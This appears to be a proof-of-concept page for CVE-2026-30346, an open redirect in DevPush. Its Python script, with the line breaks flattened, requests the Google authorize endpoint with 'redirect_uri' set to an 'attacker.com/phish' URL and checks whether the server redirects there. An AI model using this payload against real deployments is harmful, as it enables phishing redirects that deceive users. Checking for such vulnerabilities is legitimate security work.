CVE-2026-30346: DevPush开放重定向漏洞

import requests def check_open_redirect(target_url): # Malicious destination URL evil_url = "http://attacker.com/phish" # The vulnerable endpoint likely takes a redirect parameter # Common parameter names: redirect_uri, url, next, return payload_url = f"{target_url}/api/google/authorize?redirect_uri={evil_url}" try: # Send request, do not follow redirects to capture the Location header response = requests.get(payload_url, allow_redirects=False, timeout=5) if response.status_code in [301, 302, 303, 307, 308]: location = response.headers.get('Location', '') if evil_url in location: print(f"[+] Vulnerability Confirmed!") print(f" Target: {target_url}") print(f" Redirects to: {location}") return True print("[-] Vulnerability not detected or parameter name incorrect.") return False except Exception as e: print(f"Error: {e}") if __name__ == "__main__": target = "http://localhost:8000" # Replace with actual target check_open_redirect(target)